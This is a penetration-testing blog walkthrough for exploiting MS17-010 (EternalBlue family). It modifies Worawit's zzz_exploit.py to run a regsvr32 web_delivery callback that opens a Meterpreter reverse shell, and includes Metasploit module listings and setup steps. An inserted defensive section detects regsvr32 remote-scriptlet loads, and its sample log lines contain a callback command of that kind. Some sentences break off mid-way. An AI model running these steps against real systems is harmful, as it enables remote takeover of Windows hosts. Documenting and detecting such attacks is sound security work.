MS17-010 is an exploit, supposedly developed by the NSA, against the SMBv1 protocol; it was leaked in April 2017 by the Shadow Brokers. A full breakdown of MS17-010 can be found here.
This exploit is commonly found on internal penetration tests and can often lead to SYSTEM-level access via remote code execution. Metasploit ships several readily available modules for it:
```
msf > search ms17

Matching Modules
================

   Name                                                   Disclosure Date  Rank     Check  Description
   ----                                                   ---------------  ----     -----  -----------
   auxiliary/admin/mssql/mssql_enum_domain_accounts                        normal   No     Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
   auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli                   normal   No     Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration
   auxiliary/admin/mssql/mssql_enum_sql_logins                             normal   No     Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration
   auxiliary/admin/mssql/mssql_escalate_execute_as                         normal   No     Microsoft SQL Server Escalate EXECUTE AS
   auxiliary/admin/mssql/mssql_escalate_execute_as_sqli                    normal   No     Microsoft SQL Server SQLi Escalate Execute AS
   auxiliary/admin/smb/ms17_010_command                   2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                                      normal   Yes    MS17-010 SMB RCE Detection
   exploit/windows/fileformat/office_ms17_11882           2017-11-15       manual   No     Microsoft Office CVE-2017-11882
   exploit/windows/smb/ms17_010_eternalblue               2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8          2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec                    2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
```
Despite this abundance of modules, there still isn't one that consistently works against x86 targets or obscure version builds. The common complaint from Metasploit is that the target does not match the required architecture or build. This can be worked around with a customised version of Worawit's Python script.
For the purpose of testing this setup, it was done on an x64 Datacenter build that I KNOW is vulnerable to MS17-010; further work will go into confirming that this does in fact work on x86. With that said, zzz_exploit.py does state that it has been tested on all of the following versions:
- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1 x64
- Windows 2003 R2 SP2 x64
- Windows XP SP2 x64
- Windows 8.1 x86
- Windows 7 SP1 x86
- Windows 2008 SP1 x86
- Windows 2003 SP2 x86
- Windows XP SP3 x86
- Windows 2000 SP4 x86
Worawit put out a GitHub repository full of proof-of-concept code and useful scripts. The noteworthy ones are checker.py and zzz_exploit.py. zzz_exploit.py is the script that will be modified slightly to enable more manual exploitation of MS17-010, and it should allow for the exploitation of the previously mentioned Windows variants.
All credit goes to Korey Mckinley and his article; small adjustments were made to his approach to suit my current setup.
Korey introduced me to a new technique: using regsvr32 to call back to the attacker machine and download a file that creates a reverse shell. The Metasploit module for this is called web_delivery.
This is easy enough to configure. In Metasploit, use the exploit/multi/script/web_delivery module and configure the options accordingly.
This module has multiple methods for calling back to the attacker machine. However, this post will stick to regsvr32.
My Metasploit configuration looked like this:
set target 3 selects regsvr32 as the delivery method. What this module does is use the target method (regsvr32) to call back to the attacker's machine and download the payload specified. In this case, windows/x64/meterpreter/reverse_tcp is being used.
Once this module is run, it generates a command that, when run on a target machine, creates the callback. For testing, it is worth manually copying and pasting this command into your test VM and watching Metasploit to ensure that the regsvr32 command is working. Once this is done, and you're happy that it is working, this command needs to be added to
The command created:
Clone Worawit's GitHub repository. Make any permission changes needed and open up zzz_exploit.py. Line 972 is the creation of the
The first few lines of this function create a pwned.txt on the C:\ drive. This isn't required, so comment out the following:
```python
# Writes an empty marker file to the C$ admin share as proof of access; not needed here
print('creating file c:\\pwned.txt on the target')
tid2 = smbConn.connectTree('C$')
fid2 = smbConn.createFile(tid2, '/pwned.txt')
smbConn.closeFile(tid2, fid2)
smbConn.disconnectTree(tid2)
```
Underneath that, there will be an example use of the service_exec function. Uncomment this and switch out the payload for the command generated by web_delivery. The function should now look similar to this:
The function has now been updated to contain the regsvr32 command. Execute the script against the specified host with `python zzz_exploit.py 192.168.0.35`.
Once executed, you should see something similar to this:
The module shows regsvr32 calling back and collecting the payload, and the Meterpreter session being created.
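From the defender's side, the callback described above is visible in process-creation telemetry: the command web_delivery generates runs regsvr32 with a remote scriptlet URL in its /i: argument and hands it to scrobj.dll, a combination that is rare on a healthy host and therefore a high-signal detection. The following is an added example, not part of the original post, of Korey's article or of Worawit's repository. It parses a few constructed log lines in a simplified key=value process-creation layout (an assumed format, not real Sysmon or EDR output) and flags regsvr32 invocations that register a remote scriptlet; the sample line with services.exe as parent is constructed to reflect a command launched through a remotely created service, as the service_exec path would.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Constructed sample lines in a simplified "key=value" process-creation layout.
# The layout is an assumption for this example, not real Sysmon/EDR output;
# only the CommandLine and ParentImage fields are used below.
SAMPLE_LOGS = [
    'Image=C:\\Windows\\System32\\regsvr32.exe CommandLine="regsvr32.exe /s C:\\Program Files\\Vendor\\vendor.dll" ParentImage=C:\\Windows\\System32\\msiexec.exe',
    'Image=C:\\Windows\\System32\\regsvr32.exe CommandLine="regsvr32 /s /n /u /i:http://192.0.2.10:8080/abc.sct scrobj.dll" ParentImage=C:\\Windows\\System32\\services.exe',
    'Image=C:\\Windows\\System32\\cmd.exe CommandLine="cmd.exe /c whoami" ParentImage=C:\\Windows\\explorer.exe',
    'Image=C:\\Windows\\System32\\regsvr32.exe CommandLine="regsvr32.exe /s /i:HTTPS://example.test/x.sct scrobj.dll" ParentImage=C:\\Windows\\System32\\WScript.exe',
    'Image=C:\\Windows\\System32\\regsvr32.exe CommandLine="regsvr32.exe /i:http://intranet.test/config.txt C:\\Tools\\legacy.dll" ParentImage=C:\\Windows\\explorer.exe',
]

# key=value pairs; a value is either a double-quoted string or a run of non-spaces
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
# the /i: install argument pointing at a remote (http/https) resource
REMOTE_INSTALL_RE = re.compile(r'/i:\s*(https?://\S+)', re.IGNORECASE)


def parse_line(line: str) -> dict:
    """Split one log line into a field dict, stripping quotes from values."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


@dataclass
class Finding:
    severity: str  # "high" or "medium"
    reason: str
    url: str
    command: str
    parent: Optional[str]


def classify(cmd: str) -> Optional[Finding]:
    """Return a Finding when a command line makes regsvr32 fetch a remote scriptlet."""
    lower = cmd.lower()
    if "regsvr32" not in lower:
        return None
    m = REMOTE_INSTALL_RE.search(cmd)
    if not m:
        return None  # ordinary DLL registration, no remote /i: argument
    url = m.group(1)
    if "scrobj.dll" in lower:
        # The shape web_delivery's regsvr32 target produces: the scriptlet
        # handler (scrobj.dll) downloads and runs whatever the URL serves.
        return Finding("high", "regsvr32 loading scrobj.dll with a remote /i: scriptlet", url, cmd, None)
    # Remote /i: without scrobj.dll is unusual enough to review, but weaker evidence
    return Finding("medium", "regsvr32 passed a remote /i: argument", url, cmd, None)


def scan(lines: Iterable[str]) -> List[Finding]:
    """Run the classifier over every log line and attach the parent process."""
    findings = []
    for line in lines:
        fields = parse_line(line)
        finding = classify(fields.get("CommandLine", ""))
        if finding:
            finding.parent = fields.get("ParentImage")
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"[{f.severity}] {f.reason}: {f.url} (parent: {f.parent})")
```

Running the block against the constructed lines yields two high findings (the two scrobj.dll scriptlet loads) and one medium finding (a remote /i: argument with a local DLL), while the vendor DLL registration and the cmd.exe line are ignored. The parent process is kept on each finding because a regsvr32 launched by services.exe or a scripting host, rather than an installer, is the context that separates this pattern from legitimate COM registration.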
And that's how you use regsvr32 as a means to create a reverse shell from an MS17-010 Python script. The purpose of this is to allow further research into exploiting more obscure versions of Windows, and that is exactly what I will be doing in the near future. I am fairly certain this will work on x86 machines, but I will create another post confirming or denying this.
My modified fork can be found here.